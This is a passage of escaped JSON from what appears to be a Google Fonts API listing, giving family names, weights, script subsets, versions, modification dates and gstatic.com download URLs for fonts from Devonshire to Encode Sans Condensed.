\"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Devonshire\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/devonshire/v21/46kqlbDwWirWr4gtBD2BX0Vq01lYAZM.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Dhurjati\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"telugu\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-04-21\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/dhurjati/v20/_6_8ED3gSeatXfFiFX3ySKQtuTA2.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Didact Gothic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/didactgothic/v19/ahcfv8qz1zt6hCC5G4F_P4ASpUySp0LlcyQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Diplomata\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/diplomata/v24/Cn-0JtiMXwhNwp-wKxyfYGxYrdM9Sg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Diplomata SC\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/diplomatasc/v21/buExpoi3ecvs3kidKgBJo2kf-P5Oaiw4cw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Do Hyeon\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/dohyeon/v16/TwMN-I8CRRU2zM86HFE3ZwaH__-C.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Dokdo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/dokdo/v15/esDf315XNuCBLxLo4NaMlKcH.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Domine\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/domine/v19/L0xhDFMnlVwD4h3Lt9JWnbX3jG-2X3LAI10VErGuW8Q.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/domine/v19/L0xhDFMnlVwD4h3Lt9JWnbX3jG-2X0DAI10VErGuW8Q.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/domine/v19/L0xhDFMnlVwD4h3Lt9JWnbX3jG-2X6zHI10VErGuW8Q.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/domine/v19/L0xhDFMnlVwD4h3Lt9JWnbX3jG-2X5XHI10VErGuW8Q.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Donegal One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/donegalone/v20/m8JWjfRYea-ZnFz6fsK9FZRFRG-K3Mud.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Dongle\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/dongle/v8/sJoG3Ltdjt6VPkqeEcxrYjWNzXvVPA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/dongle/v8/sJoF3Ltdjt6VPkqmveRPah6RxA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/dongle/v8/sJoG3Ltdjt6VPkqeActrYjWNzXvVPA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Doppio One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/doppioone/v13/Gg8wN5gSaBfyBw2MqCh-lgshKGpe5Fg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Dorsa\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/dorsa/v23/yYLn0hjd0OGwqo493XCFxAnQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Dosis\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v27\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/dosis/v27/HhyJU5sn9vOmLxNkIwRSjTVNWLEJt7MV3BkFTq4EPw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/dosis/v27/HhyJU5sn9vOmLxNkIwRSjTVNWLEJabMV3BkFTq4EPw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/dosis/v27/HhyJU5sn9vOmLxNkIwRSjTVNWLEJN7MV3BkFTq4EPw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/dosis/v27/HhyJU5sn9vOmLxNkIwRSjTVNWLEJBbMV3BkFTq4EPw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/dosis/v27/HhyJU5sn9vOmLxNkIwRSjTVNWLEJ6bQV3BkFTq4EPw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/dosis/v27/HhyJU5sn9vOmLxNkIwRSjTVNWLEJ0LQV3BkFTq4EPw.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/dosis/v27/HhyJU5sn9vOmLxNkIwRSjTVNWLEJt7QV3BkFTq4EPw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"DotGothic16\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/dotgothic16/v15/v6-QGYjBJFKgyw5nSoDAGE7L435YPFrT.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Dr Sugiyama\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/drsugiyama/v22/HTxoL2k4N3O9n5I1boGI7abRM4-t-g7y.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Duru Sans\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/durusans/v19/xn7iYH8xwmSyTvEV_HOxT_fYdN-WZw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"DynaPuff\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/dynapuff/v1/z7N5dRvsZDIVHbYPMhZJ3HQ83UaSu4uhr7-ZFeoYkgAr1x8RSxYu6YjrSRs4wn8.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/dynapuff/v1/z7N5dRvsZDIVHbYPMhZJ3HQ83UaSu4uhr7-ZFeoYkgAr1x8RSyQu6YjrSRs4wn8.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/dynapuff/v1/z7N5dRvsZDIVHbYPMhZJ3HQ83UaSu4uhr7-ZFeoYkgAr1x8RS8gp6YjrSRs4wn8.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/dynapuff/v1/z7N5dRvsZDIVHbYPMhZJ3HQ83UaSu4uhr7-ZFeoYkgAr1x8RS_Ep6YjrSRs4wn8.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Dynalight\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/dynalight/v18/1Ptsg8LOU_aOmQvTsF4ISotrDfGGxA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"EB Garamond\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ebgaramond/v26/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-6_RUA4V-e6yHgQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/ebgaramond/v26/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-2fRUA4V-e6yHgQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/ebgaramond/v26/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-NfNUA4V-e6yHgQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ebgaramond/v26/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-DPNUA4V-e6yHgQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/ebgaramond/v26/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-a_NUA4V-e6yHgQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/ebgaramond/v26/SlGFmQSNjdsmc35JDF1K5GRwUjcdlttVFm-rI7e8QI96WamXgXFI.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/ebgaramond/v26/SlGFmQSNjdsmc35JDF1K5GRwUjcdlttVFm-rI7eOQI96WamXgXFI.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/ebgaramond/v26/SlGFmQSNjdsmc35JDF1K5GRwUjcdlttVFm-rI7diR496WamXgXFI.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/ebgaramond/v26/SlGFmQSNjdsmc35JDF1K5GRwUjcdlttVFm-rI7dbR496WamXgXFI.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/ebgaramond/v26/SlGFmQSNjdsmc35JDF1K5GRwUjcdlttVFm-rI7c8R496WamXgXFI.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Eagle Lake\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/eaglelake/v20/ptRMTiqbbuNJDOiKj9wG5O7yKQNute8.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"East Sea Dokdo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/eastseadokdo/v20/xfuo0Wn2V2_KanASqXSZp22m05_aGavYS18y.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Eater\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/eater/v21/mtG04_FCK7bOvpu2u3FwsXsR.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Economica\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/economica/v13/Qw3fZQZaHCLgIWa29ZBrMcgAAl1lfQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/economica/v13/Qw3ZZQZaHCLgIWa29ZBbM8IEIFh1fWUl.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/economica/v13/Qw3aZQZaHCLgIWa29ZBTjeckCnZ5dHw8iw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/economica/v13/Qw3EZQZaHCLgIWa29ZBbM_q4D3x9Vnksi4M7.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Eczar\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/eczar/v17/BXR2vF3Pi-DLmxcpJB-qbNTyTMDXHd6WqTIVKWJKWg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/eczar/v17/BXR2vF3Pi-DLmxcpJB-qbNTyTMDXL96WqTIVKWJKWg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/eczar/v17/BXR2vF3Pi-DLmxcpJB-qbNTyTMDXw9mWqTIVKWJKWg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/eczar/v17/BXR2vF3Pi-DLmxcpJB-qbNTyTMDX-tmWqTIVKWJKWg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/eczar/v17/BXR2vF3Pi-DLmxcpJB-qbNTyTMDXndmWqTIVKWJKWg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Edu NSW ACT Foundation\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/edunswactfoundation/v2/raxRHjqJtsNBFUi8WO0vUBgc9D-2lV_oQdCAYlt_QTQ0vUxJki9tovGLeC-sfguJ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/edunswactfoundation/v2/raxRHjqJtsNBFUi8WO0vUBgc9D-2lV_oQdCAYlt_QTQ0vUxJki9fovGLeC-sfguJ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/edunswactfoundation/v2/raxRHjqJtsNBFUi8WO0vUBgc9D-2lV_oQdCAYlt_QTQ0vUxJki-zpfGLeC-sfguJ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/edunswactfoundation/v2/raxRHjqJtsNBFUi8WO0vUBgc9D-2lV_oQdCAYlt_QTQ0vUxJki-KpfGLeC-sfguJ.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Edu QLD Beginner\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/eduqldbeginner/v2/AMOHz5iUuHLEMNXyohhc_Y56PR3A8dNLF_w3Ka4HKE4E3oebi6vyVWCN.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/eduqldbeginner/v2/AMOHz5iUuHLEMNXyohhc_Y56PR3A8dNLF_w3Ka4HKE423oebi6vyVWCN.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/eduqldbeginner/v2/AMOHz5iUuHLEMNXyohhc_Y56PR3A8dNLF_w3Ka4HKE7a2Yebi6vyVWCN.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/eduqldbeginner/v2/AMOHz5iUuHLEMNXyohhc_Y56PR3A8dNLF_w3Ka4HKE7j2Yebi6vyVWCN.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Edu SA Beginner\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/edusabeginner/v2/rnC_-xRb1x-1lHXnLaZZ2xOoLIGfU3L82irpr_3C9989fo1yBydUEDs.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/edusabeginner/v2/rnC_-xRb1x-1lHXnLaZZ2xOoLIGfU3L82irpr_3C9-09fo1yBydUEDs.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/edusabeginner/v2/rnC_-xRb1x-1lHXnLaZZ2xOoLIGfU3L82irpr_3C9wE6fo1yBydUEDs.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/edusabeginner/v2/rnC_-xRb1x-1lHXnLaZZ2xOoLIGfU3L82irpr_3C9zg6fo1yBydUEDs.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Edu TAS Beginner\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/edutasbeginner/v2/ZXuwe04WubHfGVY-1TcNg7AFUmshg8jIUTzK3r34f_HwemkrBWRhvk02.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/edutasbeginner/v2/ZXuwe04WubHfGVY-1TcNg7AFUmshg8jIUTzK3r34f_HCemkrBWRhvk02.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/edutasbeginner/v2/ZXuwe04WubHfGVY-1TcNg7AFUmshg8jIUTzK3r34f_EufWkrBWRhvk02.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/edutasbeginner/v2/ZXuwe04WubHfGVY-1TcNg7AFUmshg8jIUTzK3r34f_EXfWkrBWRhvk02.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Edu VIC WA NT Beginner\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/eduvicwantbeginner/v2/jiz2RF1BuW9OwcnNPxLl4KfZCHd9nFtd5Tu7stCpElYpvPfZZ-OXlPmFXwnpkeGR.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/eduvicwantbeginner/v2/jiz2RF1BuW9OwcnNPxLl4KfZCHd9nFtd5Tu7stCpElYpvPfZZ-OllPmFXwnpkeGR.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/eduvicwantbeginner/v2/jiz2RF1BuW9OwcnNPxLl4KfZCHd9nFtd5Tu7stCpElYpvPfZZ-NJk_mFXwnpkeGR.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/eduvicwantbeginner/v2/jiz2RF1BuW9OwcnNPxLl4KfZCHd9nFtd5Tu7stCpElYpvPfZZ-Nwk_mFXwnpkeGR.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"El Messiri\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/elmessiri/v18/K2FhfZBRmr9vQ1pHEey6GIGo8_pv3myYjuXwe65ghj3OoapG.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/elmessiri/v18/K2FhfZBRmr9vQ1pHEey6GIGo8_pv3myYjuXCe65ghj3OoapG.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/elmessiri/v18/K2FhfZBRmr9vQ1pHEey6GIGo8_pv3myYjuUufK5ghj3OoapG.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/elmessiri/v18/K2FhfZBRmr9vQ1pHEey6GIGo8_pv3myYjuUXfK5ghj3OoapG.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Electrolize\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-04-21\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/electrolize/v14/cIf5Ma1dtE0zSiGSiED7AUEGso5tQafB.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Elsie\",\n      \"variants\": [\n        \"regular\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/elsie/v12/BCanqZABrez54yYu9slAeLgX.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/elsie/v12/BCaqqZABrez54x6q2-1IU6QeXSBk.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Elsie Swash Caps\",\n      \"variants\": [\n        \"regular\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/elsieswashcaps/v21/845DNN8xGZyVX5MVo_upKf7KnjK0ferVKGWsUo8.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/elsieswashcaps/v21/845ENN8xGZyVX5MVo_upKf7KnjK0RW74DG2HToawrdU.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Emblema One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/emblemaone/v21/nKKT-GQ0F5dSY8vzG0rOEIRBHl57G_f_.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Emilys Candy\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/emilyscandy/v13/2EbgL-1mD1Rnb0OGKudbk0y5r9xrX84JjA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Encode Sans\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGGHiZtWP7FJCt2c.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGOHjZtWP7FJCt2c.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGD_jZtWP7FJCt2c.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGGHjZtWP7FJCt2c.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGFPjZtWP7FJCt2c.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGL_kZtWP7FJCt2c.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGIbkZtWP7FJCt2c.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGOHkZtWP7FJCt2c.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGMjkZtWP7FJCt2c.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Encode Sans Condensed\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        